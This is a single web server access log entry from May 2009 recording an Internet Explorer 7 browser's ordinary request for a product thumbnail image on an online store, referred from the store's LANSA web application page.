66.231.111.68 - - [13/May/2009:00:16:20 -0400] "GET /images/items/ALLOOSS2_THUMB.JPG HTTP/1.1" 200 2001 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L001BEE4A0D415900168C06K+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
